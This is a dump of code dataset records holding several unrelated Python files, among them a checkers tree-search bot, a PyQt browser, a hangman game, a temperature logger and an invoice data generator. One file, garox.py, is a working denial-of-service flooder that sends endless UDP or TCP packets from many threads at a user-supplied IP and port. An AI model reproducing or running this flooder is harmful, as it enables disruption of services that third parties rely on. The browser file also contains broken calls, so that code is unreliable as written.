processed_files:\n yield (root, fle)\n\n\ndef extract_content(in_path, out_path):\n log.info('\\n\\nextracting %s -> %s\\n', in_path, out_path)\n\n with gzip.open(in_path, 'rb') as in_file:\n with open(out_path, 'wb') as out_file:\n shutil.copyfileobj(in_file, out_file)\n\n\ndef record_file_processed(fle, state_path):\n with open(state_path, 'a') as state_fle:\n state_fle.write(fle + '\\n');\n\n\ndef process_directory(source_dir, output_dir, state_path):\n log.info('\\n\\nprocessing %s\\n\\n', source_dir)\n\n unprocessed_items = get_unprocessed_files(source_dir, state_path)\n\n for (root, fle) in unprocessed_items:\n name = path.splitext(fle)[0]\n\n in_path = path.join(root, fle)\n out_path = path.join(output_dir, name)\n\n extract_content(in_path, out_path)\n\n 
record_file_processed(fle, state_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Process a directory containing usage data\")\n\n parser.add_argument(\n '--src', help='source directory', required=True)\n parser.add_argument(\n '--dest', help='destination directory', required=True)\n\n parser.add_argument(\n '--log-level', help='logging level', default='DEBUG')\n\n parser.add_argument(\n '--history', help='history file location', default='DEBUG')\n\n args = parser.parse_args()\n\n logging.basicConfig(level=args.log_level)\n\n state_path = path.join(args.history, 'processed_items.txt')\n\n process_directory(args.src, args.dest, state_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wandabwa2004/stuff","sub_path":"useful-Python/check_new_files.py","file_name":"check_new_files.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35667254082","text":"#!/usr/bin/python3\nfrom __future__ import print_function\nimport socket\n#from __builtins__ import input\nimport types\n\n\nclass MySocket:\n \"\"\"demonstration class only\n - coded for clarity, not efficiency\n \"\"\"\n\n def __init__(self, sock=None):\n if sock is None:\n self.sock = socket.socket(\n socket.AF_INET, socket.SOCK_STREAM)\n else:\n self.sock = sock\n\n def connect(self, host, port):\n self.sock.connect((host, port))\n\n def mysend(self, msg):\n totalsent = 0\n self.msglen = len(msg)\n msg = msg.encode()\n while totalsent < self.msglen:\n sent = self.sock.send(msg[totalsent:])\n if sent == 0:\n raise RuntimeError(\"socket connection broken\")\n totalsent = totalsent + sent\n\n def myreceive(self):\n chunks = []\n bytes_recd = 0\n while True:\n\n chunk = self.sock.recv(128)\n if chunk == b'':\n raise RuntimeError(\"socket connection broken\")\n chunks.append(chunk)\n bytes_recd = bytes_recd + len(chunk)\n print(chunk)\n if \"\\n\" in chunk.decode():\n break;\n 
return b''.join(chunks)\nif __name__ == '__main__':\n s = MySocket()\n s.connect(raw_input(\"ip ? >\"),53820)\n r=True\n try:\n while r:\n i = raw_input(\"command ? >\")\n s.mysend(i)\n #s.mysend(\"move up 100\")\n print(\"received in response > \",s.myreceive())\n except KeyboardInterrupt as e:\n r=False\n s.sock.close()\n","repo_name":"Grisou13/pidrone","sub_path":"serveur/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"7643468925","text":"from random import randint\nfrom BoardClasses import Move, Board\nfrom time import time\nfrom copy import deepcopy\nfrom math import sqrt, log\nfrom operator import attrgetter#, itemgetter\n\nOPPONENT = {1:2, 2:1}\n\ndef get_random_move(board, color) -> Move:\n '''\n Given a board state and color, returns a random move.\n '''\n moves = board.get_all_possible_moves(color)\n index = randint(0, len(moves) - 1)\n inner_index = randint(0, len(moves[index]) - 1)\n return moves[index][inner_index]\n \nclass StudentAI():\n def __init__(self, col, row, p):\n self.col = col\n self.row = row\n self.p = p\n self.board = Board(col, row, p)\n self.board.initialize_game()\n self.color = 2\n self.mcts = MCTS(TreeNode(self.board, self.color, None, None))\n self.total_time_remaining = 479\n self.time_divisor = row * col * 0.5\n self.timed_move_count = 2\n \n def get_move(self, move) -> Move:\n '''\n prune tree with opponent move\n MCTS\n '''\n # Start timer\n start_time = time()\n \n # Check if opponent gave a turn and execute it\n if len(move) != 0:\n self.play_move(move, OPPONENT[self.color])\n # If first move of game, change self.color and make random move\n else:\n self.color = 1\n self.mcts.root = TreeNode(self.board, self.color, None, None)\n\n moves = self.board.get_all_possible_moves(self.color)\n first_move = moves[0][1]\n self.play_move(first_move, self.color)\n return first_move\n 
\n # Check if only one move is possible\n moves = self.board.get_all_possible_moves(self.color)\n if len(moves) == 1 and len(moves[0]) == 1:\n self.play_move(moves[0][0], self.color)\n return moves[0][0]\n \n # Set up time limit\n time_limit = self.total_time_remaining / self.time_divisor\n \n # MCTS\n move_chosen = self.mcts.search(time_limit)\n self.play_move(move_chosen, self.color)\n \n # Change time divisor\n self.time_divisor -= 0.5 - 1/self.timed_move_count\n self.timed_move_count += 1\n \n # Decrement time remaining and return\n self.total_time_remaining -= time() - start_time\n return move_chosen\n \n def play_move(self, move, color):\n \"\"\"\n Updates board and tree root using Move given,\n either Move we just played or Move given by opponent.\n \"\"\"\n self.board.make_move(move, color)\n \n for child in self.mcts.root.children.items():\n if str(move) == str(child[0]) and child[1] is not None:\n self.mcts.root = child[1]\n self.mcts.root.parent = None\n return\n\n self.mcts.root = TreeNode(self.board, OPPONENT[color], None, None)\n \nclass MCTS():\n def __init__(self, root):\n self.root = root\n \n def search(self, time_limit) -> Move:\n '''\n Performs Monte Carlo Tree Search until time runs out.\n Returns the best move.\n '''\n timeout = time() + time_limit\n \n while time() < timeout:\n # select node from the tree\n node = self.selection(self.root)\n \n # simulate outcome of the game\n temp_board = deepcopy(node.board)\n temp_color = node.color\n win_val = temp_board.is_win(OPPONENT[temp_color])\n \n while not win_val:\n temp_board.make_move(get_random_move(temp_board, temp_color), temp_color)\n win_val = temp_board.is_win(temp_color)\n temp_color = OPPONENT[temp_color]\n \n if win_val == OPPONENT[node.color]:\n win_for_parent = 1\n elif win_val == node.color:\n win_for_parent = -1\n elif win_val == -1:\n win_for_parent = 0\n \n # update values in tree\n node.backpropogate(win_for_parent)\n\n return self.best_child()\n \n def selection(self, node) -> 
'TreeNode':\n '''\n Recursively traverses the tree to find a terminal node with the highest UCB value,\n then expands a new unexplored node.\n '''\n if len(node.children) == 0:\n return node\n if None not in node.children.values():\n sorted_children = sorted(node.children.values(), key=attrgetter('ucb_value'), reverse=True)\n return self.selection(sorted_children[0])\n for move, child in node.children.items():\n if child is None:\n node.children[move] = TreeNode(node.board, OPPONENT[node.color], move, node)\n return node.children[move]\n \n def best_child(self) -> Move:\n '''\n Return the move with highest visit count.\n '''\n# if None in self.root.children.values():\n# return get_random_move(self.root.board, self.root.color)\n\n sorted_moves = sorted(self.root.children.items(), key=lambda x: x[1].visit_count, reverse=True)\n return sorted_moves[0][0]\n \nclass TreeNode():\n def __init__(self, board, color, move, parent):\n self.board = deepcopy(board)\n self.color = color\n self.parent = parent\n self.visit_count = 1\n self.wins_for_parent = 0\n self.ucb_value = 0\n \n # Execute nodes' first move\n if move is not None:\n self.board.make_move(move, OPPONENT[self.color])\n\n # Only create children if game is already over \n self.children = dict()\n if self.board.is_win(OPPONENT[self.color]) == 0:\n moves_list = self.board.get_all_possible_moves(self.color)\n for i in range(len(moves_list)):\n for j in range(len(moves_list[i])):\n self.children[moves_list[i][j]] = None\n \n def backpropogate(self, win_for_parent) -> None:\n '''\n REcursively updates statistics for this node and all parents,\n given an outcome of the game.\n (1 is win for the parent, -1 is loss for the parent, 0 is tie,\n decimal values are based on heuristic)\n '''\n self.visit_count += 1\n \n if self.parent:\n self.parent.backpropogate(-win_for_parent)\n \n if win_for_parent > 0:\n self.wins_for_parent += win_for_parent\n elif not win_for_parent:\n self.wins_for_parent += 0.5\n \n # calculate UCB 
value\n self.ucb_value = self.wins_for_parent/self.visit_count + sqrt(2)*sqrt(log(self.parent.visit_count)/self.visit_count)\n \n# REMOVE THIS BEFORE SUBMITTING #\n# if __name__ == '__main__':\n# import os\n# os.system('python3 main.py 7 7 2 m main.py')\n# REMOVE THIS BEFORE SUBMITTING #\n","repo_name":"ethanlouie/DeepBlueDream","sub_path":"src/checkers-python/StudentAI.py","file_name":"StudentAI.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38293148694","text":"import sys\r\nimport tkinter as tk\r\nfrom PyQt5.QtCore import QUrl\r\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineProfile\r\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QHBoxLayout, QLineEdit, QPushButton, QWidget,QMainWindow\r\n\r\nclass PrivateBrowser(QWebEngineView):\r\n def __init__(self):\r\n super().__init__()\r\n profile = self.page().profile()\r\n profile.setHttpCacheType(QWebEngineProfile.NoCache)\r\n profile.setPersistentCookiesPolicy(QWebEngineProfile.NoPersistentCookies)\r\n self.setUrl(QUrl(\"https://www.google.com\"))\r\n self.show()\r\n \r\nclass MainWindow(QMainWindow):\r\n def __init__(self) :\r\n super().__init__()\r\n self.browser = PrivateBrowser()\r\n self.url_bar = QLineEdit()\r\n self.go_button = QPushButton(\"Go\")\r\n self.back_button = QPushButton(\"<-\")\r\n self.forward_button = QPushButton(\"->\")\r\n self.init_ui()\r\n \r\n def init_ui(self):\r\n central_widget = QWidget()\r\n layout = QVBoxLayout()\r\n layout.addwidget(self.browser)\r\n h_layout = QHBoxLayout()\r\n h_layout = addwidget(self.back_button)\r\n h_layout = addwidget(self.forward_button)\r\n h_layout = addwidget(self.url_bar)\r\n h_layout = addwidget(self.go_button)\r\n layout.addLayout(h_layout)\r\n central_widget.setLayout(layout)\r\n self.setCentralWidget(central_widget)\r\n self.go_button.clicked.connect(self.load_url)\r\n 
self.back_button.clicked.connect(self.browser.back)\r\n self.forward_button.clicked.connect(self.browser.forward)\r\n self.url_bar.returnPressed.connect(self.load_url)\r\n \r\n def load_url(self):\r\n url = self.url_bar.text()\r\n if not url.startswith(\"http\"):\r\n url = \"http://\"+ url\r\n \r\n self.browser.setUrl(QUrl(url))\r\n \r\nif __name__ == '__main__':\r\n from PyQt5.QtWidgets import QApplication, QLabel, QVBoxLayout, QWidget\r\n\r\napp = QApplication([])\r\n\r\n# Create a QWebEngineView widget\r\nweb_view = QWebEngineView()\r\nweb_view.load(QUrl(\"http://www.google.com\"))\r\n\r\n# Create a QVBoxLayout\r\nlayout = QVBoxLayout()\r\n\r\n# Add the web_view widget to the layout\r\nlayout.addWidget(web_view)\r\n\r\nbutton_layout = QHBoxLayout()\r\n\r\nback_button = QPushButton(\"Back\")\r\nback_button.clicked.connect(web_view.back)\r\n\r\nforward_button = QPushButton(\"Forward\")\r\nforward_button.clicked.connect(web_view.forward)\r\n\r\nbutton_layout.addWidget(back_button)\r\nbutton_layout.addWidget(forward_button)\r\n\r\nlayout.addLayout(button_layout)\r\n\r\n# Create a QWidget and set the layout\r\nwidget = QWidget()\r\nwidget.setLayout(layout)\r\n\r\n# Show the widget\r\nwidget.show()\r\n\r\n# Start the event loop\r\napp.exec_()\r\n\r\n\r\n\r\nclass TabbedBrowser(tk.Tk):\r\n def __init__(self, *args, **kwargs):\r\n tk.Tk.__init__(self, *args, **kwargs)\r\n\r\n self.tabs = {}\r\n self.current_tab = None\r\n\r\n # Create a notebook widget to hold the tabs\r\n self.notebook = tk.ttk.Notebook(self)\r\n self.notebook.pack(fill=\"both\", expand=True)\r\n\r\n def add_tab(self, url):\r\n # Create a new tab and add it to the notebook\r\n tab = tk.Frame(self.notebook)\r\n self.notebook.add(tab, text=\"New Tab\")\r\n self.notebook.select(tab)\r\n\r\n # Save the tab in a dictionary to keep track of it\r\n self.tabs[url] = tab\r\n self.current_tab = tab\r\n\r\n def switch_to_tab(self, url):\r\n # Show the selected tab\r\n tab = self.tabs[url]\r\n 
self.notebook.select(tab)\r\n self.current_tab = tab\r\n\r\nif __name__ == \"__main__\":\r\n browser = TabbedBrowser()\r\n browser.add_tab(\"https://www.google.com\")\r\n browser.mainloop()\r\n","repo_name":"anushkasharma22/Private-Web-Browser","sub_path":"browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"6736637723","text":"\"\"\"\n给定一个排序数组,你需要在原地删除重复出现的元素,使得每个元素只出现一次,返回移除后数组的新长度。\n\n不要使用额外的数组空间,你必须在原地修改输入数组并在使用 O(1) 额外空间的条件下完成。\n\n示例 1:\n\n给定数组 nums = [1,1,2],\n\n函数应该返回新的长度 2, 并且原数组 nums 的前两个元素被修改为\n1, 2。\n你不需要考虑数组中超出新长度后面的元素。\n示例 2:\n\n给定 nums = [0,0,1,1,1,2,2,3,3,4],\n\n函数应该返回新的长度 5, 并且原数组 nums 的前五个元素被修改为\n0, 1, 2, 3, 4。\n你不需要考虑数组中超出新长度后面的元素。\n\n\n思路:\n\n原地替换,将重复位置的元素替换为下个非重复元素。\n\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n # 第一个指针用于更改值\n first = 0\n # 第二个指针用于遍历\n for second in range(len(nums)):\n # 如果和之前记录的值不同\n if nums[first] != nums[second]:\n # 第一个指针先加1\n first += 1\n # 然后赋值\n nums[first] = nums[second]\n return first + 1\n","repo_name":"wulinglin/118-classic-Questions-of-LeetCode","sub_path":"9.双指针+滑动窗口/26-removeDuplicates.py","file_name":"26-removeDuplicates.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"33"} +{"seq_id":"11163105178","text":"\n\"\"\"\nName: Lexie DelViscio\nhw9.py\n\nProblem: This program creates sub functions for a hangman game as well as a command line version of hangman.\n\nregarding Gui function\n # I did work on this, I honestly could not figure out anything past basics stuff and nothing\n felt worth keeping.\n # I wanted to say that I did not want to leave it blank, and I apologize for doing so,\n but I genuinely cannot\n # figure it out as of what we have learned and spent time on in class so far.\nCertification of Authenticity:\nI certify 
that this assignment is entirely my own work.\n\"\"\"\nfrom random import randint\n\n\ndef get_words(file_name):\n file = open(file_name, 'r')\n file_full = file.readlines()\n words = []\n for i in file_full:\n words += [i]\n return words\n\n\ndef get_random_word(words):\n secret_word = (words[randint(0, len(words)-1)])\n secret_word = secret_word.strip()\n return secret_word\n\n\ndef letter_in_secret_word(letter, secret_word):\n if letter in secret_word:\n return True\n else:\n return False\n\n\ndef already_guessed(letter, guesses):\n if letter in guesses:\n return True\n else:\n return False\n\n\ndef make_hidden_secret(secret_word, guesses):\n guessed = ''\n for i in range(len(secret_word)):\n if secret_word[i] in guesses:\n guessed += secret_word[i] + \" \"\n else:\n guessed += \"_ \"\n guessed = guessed.strip()\n return guessed\n\n\ndef won(guessed):\n if \"_\" in guessed:\n return False\n else:\n return True\n\n\ndef play_graphics(secret_word):\n pass\n # I did work on this, I honestly could not figure out anything past basics stuff and nothing felt\n # worth keeping. 
I wanted to say that I did not want to leave it blank,\n # and I apologize for doing so, but I genuinely cannot\n # figure it out as of what we have learned and spent time on in class so far.\n\n\ndef play_command_line(secret_word):\n guessed = []\n guesses_remaining = 6\n guessed_right = make_hidden_secret(secret_word, guessed)\n while guesses_remaining >= 0 and not guessed_right == secret_word:\n print(\"already guessed:\", guessed)\n print(\"guesses remaining:\", guesses_remaining)\n print(guessed_right)\n player_guess = input(\"guess a letter: \")\n guessed.append(player_guess)\n if letter_in_secret_word(player_guess, secret_word):\n guessed_right = make_hidden_secret(secret_word, guessed)\n else:\n guesses_remaining -= 1\n if guessed_right.split(\" \") == list(secret_word):\n print(\"winner!\\n\" + guessed_right)\n break\n elif guesses_remaining == 0:\n print(\"sorry, you did not guess the word.\")\n print(\"the secret word was \" + secret_word)\n else:\n print()\n\n\nif __name__ == '__main__':\n pass\n # play_command_line(secret_word)\n # play_graphics(secret_word)\n","repo_name":"Lexie-DelViscio/220","sub_path":"assignments/hw9/hw9.py","file_name":"hw9.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30351214115","text":"import interactions\nfrom interactions import Client, CommandContext\nfrom utils.mongo_db import MongoDBHandler\n\nembed_color = 0xfd7c42\nhandler = MongoDBHandler('database')\n\nclass Credentials(interactions.Extension):\n def __init__(self, client):\n self.client: Client = client\n\n @interactions.extension_command()\n async def credentials(self, ctx: CommandContext): # Make sure the type of variable is the same \n await ctx.defer(ephemeral=True)\n embed = interactions.Embed(title='Credentials', color=embed_color)\n try:\n r = handler.get_user_credentials(user_id=str(ctx.author.id))\n if r:\n openai_api_key = 
r['credentials']['openai_api_key']\n embed.add_field(name='OpenAI API Key', value=f'`{openai_api_key}`', inline=True)\n elif r == None:\n embed.add_field(name=\"Error\", value='No credentials set! Use `/set_credentials`.', inline=True)\n await ctx.send(embeds=embed, ephemeral=True)\n except Exception as e:\n print(e)\n\ndef setup(client):\n Credentials(client)\n","repo_name":"Haste171/langchain-chatbot","sub_path":"modules/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":317,"dataset":"github-code","pt":"33"} +{"seq_id":"1166772146","text":"# Author(s) Jeanette Gowen\r\n# Date 5/29/2018\r\n# Title PercentCO2\r\n# Used to calculate Percent CO2\r\n# Code version 1.00\r\n# Type (Python Custom Module)\r\n\r\ndef calcpercentCO2(loitareWeight, loisampleWeight, loiignitionwt550, loiignitionwt950):\r\n\troundperCO2 = None\r\n\tif loitareWeight and loisampleWeight and loiignitionwt550 and loiignitionwt950:\r\n\t\tpercentCO2 = ((loiignitionwt550 - loiignitionwt950)/(loisampleWeight - loitareWeight)) * 100\r\n\t\troundperCO2 = round(percentCO2, 2)\r\n\treturn roundperCO2\r\n\r\n\r\n","repo_name":"michaelelasky/AP_MnCustomScripts","sub_path":"PercentCO2.py","file_name":"PercentCO2.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15522672605","text":"GROUND_X_LENGTH = 2000\nGROUND_Z_LENGTH = 2000\nOBST_X_LENGTH = 200\nOBST_Z_LENGTH = 200\nROBOT_HEIGHT = 0.1\nNUM_CUBES = 50\nCUBE_SIDE = 4\nNUM_PYRAMIDS = 50\nPYRAMID_SIDE = 6\nWALL_HEIGHT = 20\n\n\nINITIAL_LIFE = 100\nMIN_LIFE = 0\nMAX_TIME = (10**3) #60 sec\nRADIUS = 10\nLIFE_FACTOR = 10\nMOVE_SIZE = 
5\n","repo_name":"GuptaVakul101/WoxBot","sub_path":"arena/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73292192733","text":"import machine\nimport utime\nimport os\n\nsensor_temp = machine.ADC(4)\nconversion_factor = 3.3 / (65535)\nstart_time = utime.time()\n\nled = machine.Pin(25, machine.Pin.OUT)\n\ndef get_temperature():\n reading = sensor_temp.read_u16() * conversion_factor\n temperature = 27 - (reading - 0.706)/0.001721\n return temperature\n\ndef get_filename():\n i = 0\n while True:\n filename = f'temp_{i}.csv'\n try:\n os.stat(filename)\n i += 1\n except OSError:\n break\n return filename\n\n\nfilename = get_filename()\nwith open(filename, 'w') as f:\n f.write('delta t (min),temp (c)\\n')\n\nwhile True:\n delta_t = (utime.time() - start_time) / 60\n temperature = get_temperature()\n with open(filename, 'a') as f:\n f.write(f'{delta_t:.2f},{temperature:.2f}\\n')\n \n led.value(1)\n utime.sleep(0.5)\n led.value(0)\n \n utime.sleep(4.5)\n","repo_name":"Aweymouth13/rp_pico","sub_path":"temp_take.py","file_name":"temp_take.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"17140920193","text":"import kfp.deprecated.dsl as dsl\nfrom kubernetes.client.models import V1EnvVar\n\n\n@dsl.pipeline(\n name='PipelineParams',\n description='A pipeline with multiple pipeline params.')\ndef pipelineparams_pipeline(tag: str = 'latest', sleep_ms: int = 10):\n\n echo = dsl.Sidecar(\n name='echo',\n image='hashicorp/http-echo:%s' % tag,\n args=['-text=\"hello world\"'],\n )\n\n op1 = dsl.ContainerOp(\n name='download',\n image='busybox:%s' % tag,\n command=['sh', '-c'],\n arguments=[\n 'sleep %s; wget localhost:5678 -O /tmp/results.txt' % sleep_ms\n ],\n sidecars=[echo],\n file_outputs={'downloaded': '/tmp/results.txt'})\n\n op2 = 
dsl.ContainerOp(\n name='echo',\n image='library/bash',\n command=['sh', '-c'],\n arguments=['echo $MSG %s' % op1.output])\n\n op2.container.add_env_variable(\n V1EnvVar(name='MSG', value='pipelineParams: '))\n","repo_name":"kubeflow/pipelines","sub_path":"sdk/python/tests/compiler/testdata/pipelineparams.py","file_name":"pipelineparams.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":3324,"dataset":"github-code","pt":"33"} +{"seq_id":"21266747961","text":"import random\nimport socket\nimport threading\nimport os\n\nos.system(\"clear\")\nprint(\"Attacked by lans\")\nprint(\"gunain dengan bijak\")\nprint(\"welcome back, im here\")\nip = str(input(\" DdosAttackByLANS | Ip:\"))\nport = int(input(\" DdosAttackByLANS | Port:\"))\nchoice = str(input(\" DdosAttackByLANS | yakin ????(y/n):\"))\ntimes = int(input(\" DdosAttackByLANS | Packets:\"))\nthreads = int(input(\" DdosAttackByLANS | Threads:\"))\ndef run():\n\tdata = random._urandom(1024)\n\ti = random.choice((\"[*]\",\"[!]\",\"[#]\"))\n\twhile True:\n\t\ttry:\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t\taddr = (str(ip),int(port))\n\t\t\tfor x in range(times):\n\t\t\t\ts.sendto(data,addr)\n\t\t\tprint(i +\" | LANS IN HERE |\")\n\t\texcept:\n\t\t\tprint(\"[!] 
| yahahaha |\")\n\ndef run2():\n\tdata = random._urandom(16)\n\ti = random.choice((\"[*]\",\"[!]\",\"[#]\"))\n\twhile True:\n\t\ttry:\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\ts.connect((ip,port))\n\t\t\ts.send(data)\n\t\t\tfor x in range(times):\n\t\t\t\ts.send(data)\n\t\t\tprint(i +\" tok tok misii !!\")\n\t\texcept:\n\t\t\ts.close()\n\t\t\tprint(\"[*] MISII PAKETTT\")\n\nfor y in range(threads):\n\tif choice == 'y':\n\t\tth = threading.Thread(target = run)\n\t\tth.start()\n\telse:\n\t\tth = threading.Thread(target = run2)\n\t\tth.start()\n","repo_name":"Gang180/garox","sub_path":"garox.py","file_name":"garox.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10137593785","text":"import sys\nimport dateutil.relativedelta\nimport random\nimport numpy\n\nfrom time import gmtime, strftime\nfrom datetime import datetime\n\nNODRIVERS = 150\nNOROADS = 10000\nNOCLIENTS = 2500\n\nif __name__ == '__main__':\n\tt1_size = t2_size = 0\n\targs = sys.argv[1:]\n\titerator = 0\n\tfor arg in args:\n\t\tif (arg == '-t1'):\n\t\t\tt1_size = int(args[iterator+1])\n\t\telif (arg == '-t2'):\n\t\t\tt2_size = int(args[iterator+1])\n\t\titerator = iterator + 1\n\tt2_size = t2_size - t1_size\n\t\n\tklienci = open(\"pesel.txt\", \"r\")\n\tklienttable = klienci.readlines()\n\tkierowcy = open(\"pesel_kierowcy.txt\", \"r\")\n\tkierowcytable = kierowcy.readlines()\n\trejestracje = open(\"nr_rejestracyjny.txt\", \"r\")\n\trejestracjetable = rejestracje.readlines()\n\t\n\tfaktury = open(\"insert/faktury_t1.sql\", \"w\")\n\tarkusz_3 = open(\"arkusz/arkusz_3_t1.csv\", \"w\")\n\tarkusz_3.write(\"Data rozpoczęcia zmiany; Data zakończenia zmiany; Numer rejestracyjny pojazdu; PESEL kierowcy\\n\")\n\tCI_created = 0\n\tCI_number_act = 1\n\ttime_now = datetime.now()\n\ttime = time_now - dateutil.relativedelta.relativedelta(years=10)\n\ttime_for_driver_main = time\n\t\n\tfor i 
in range(0, 2):\n\t\tif (i == 1):\n\t\t\tfaktury.close()\n\t\t\tfaktury = open(\"insert/faktury_t2.sql\", \"w\")\n\t\t\tt1_size = t2_size\n\t\t\tCI_created = 0\n\t\t\tarkusz_3.close()\n\t\t\tarkusz_3 = open(\"arkusz/arkusz_3_t2.csv\", \"w\")\n\t\t\n\t\tCI_act_year = str(time.year)\n\t\tif (t1_size > 0):\n\t\t\twhile(True):\n\t\t\t\tperiod_time_start_main = time_for_driver_main + dateutil.relativedelta.relativedelta(hours=random.randint(0,3))\n\t\t\t\ttime_for_driver_main = period_time_start_main\n\t\t\t\tperiod_time_end_main = period_time_start_main + dateutil.relativedelta.relativedelta(hours=random.randint(3,14))\n\t\t\t\tdrivers_used = numpy.zeros(NODRIVERS)\n\t\t\t\tfor drivers_count in range (0, random.randint(10, int(NODRIVERS/3))):\n\t\t\t\t\tdriver = random.randint(0, NODRIVERS-1)\n\t\t\t\t\twhile(drivers_used[driver] == 1):\n\t\t\t\t\t\tdriver = random.randint(0, NODRIVERS-1)\n\t\t\t\t\tdrivers_used[driver] = 1\n\t\t\t\t\t\n\t\t\t\t\tperiod_time_start = period_time_start_main + dateutil.relativedelta.relativedelta(minutes=random.randint(0,40))\n\t\t\t\t\ttime_for_driver = time_for_driver_main + dateutil.relativedelta.relativedelta(minutes=random.randint(0,40))\n\t\t\t\t\tperiod_time_end = period_time_end_main + dateutil.relativedelta.relativedelta(minutes=random.randint(0,40))\n\t\t\t\t\t\n\t\t\t\t\twhile(time_for_driver < period_time_end):\n\t\t\t\t\t\tstart_time = time_for_driver + dateutil.relativedelta.relativedelta(minutes=random.randint(1,50)) + dateutil.relativedelta.relativedelta(minutes=random.randint(0,20))\n\t\t\t\t\t\tend_time = start_time + dateutil.relativedelta.relativedelta(minutes=random.randint(8,60))\n\t\t\t\t\t\tklient = klienttable[random.randint(0,NOCLIENTS-1)].replace(\"\\n\", \"\")\n\t\t\t\t\t\tkierowca = kierowcytable[driver].replace(\"\\n\", \"\")\n\t\t\t\t\t\tstatus_platnosci = random.randint(0,1)\n\t\t\t\t\t\tkilometry = random.randint(100,5000)/100.0\n\t\t\t\t\t\toplata = kilometry*2 + 6.0\n\t\t\t\t\t\toplata = 
float(\"{0:.2f}\".format(oplata))\n\t\t\t\t\t\ttrasa = random.randint(0,NOROADS - 1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif (str(end_time.year) != CI_act_year):\n\t\t\t\t\t\t\tCI_number_act = 1\n\t\t\t\t\t\t\tCI_act_year = str(end_time.year)\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tCI_number = str(CI_number_act) + '/' + str(end_time.year)\n\t\t\t\t\t\tCI_number_act = CI_number_act + 1\n\t\t\t\t\t\t\n\t\t\t\t\t\tto_insert = \"insert into FAKTURY values (\" + \"\\'\" + CI_number + \"\\'\" + \", \" + \"\\'\" + klient + \"\\'\" + \", \" + \"\\'\" + kierowca + \"\\'\" + \", \" + \"\\'\" + str(trasa) + \"\\'\" + \", \" + \"\\'\" + str(oplata) + \"\\'\" + \", \"+ \"\\'\" + str(kilometry) + \"\\'\" + \", \" + \"\\'\" + start_time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"\\'\" + \", \" + \"\\'\" + end_time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"\\'\" + \", \" + \"\\'\" + str(status_platnosci) + \"\\'\" + \");\\n\"\n\t\t\t\t\t\tfaktury.write(to_insert)\n\t\t\t\t\t\t\n\t\t\t\t\t\tCI_created = CI_created + 1\t\t\t\t\n\t\t\t\t\t\ttime_for_driver = end_time\n\t\t\t\t\t\t\n\t\t\t\t\t\tif (CI_created >= t1_size):\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\trejestracja_samochodu = rejestracjetable[driver].replace(\"\\n\", \"\")\n\t\t\t\t\tkierowca = kierowcytable[driver].replace(\"\\n\", \"\")\n\t\t\t\t\tarkusz_3.write(period_time_start.strftime(\"%d.%m.%Y %H:%M\") + \"; \" + period_time_end.strftime(\"%d.%m.%Y %H:%M\") + \"; \" + rejestracja_samochodu + \"; \" + kierowca + \"\\n\")\n\t\t\t\t\tif (CI_created >= t1_size):\n\t\t\t\t\t\tbreak\n\t\t\t\tif (CI_created >= t1_size):\n\t\t\t\t\tbreak\n\t\t\t\ttime_for_driver_main = period_time_end_main\n","repo_name":"amadeusz-chmielowski/generatot_danych","sub_path":"insert_faktury.py","file_name":"insert_faktury.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"5710276120","text":"# NOTE\n# We cannot directly perform any operation on a tuple as its 
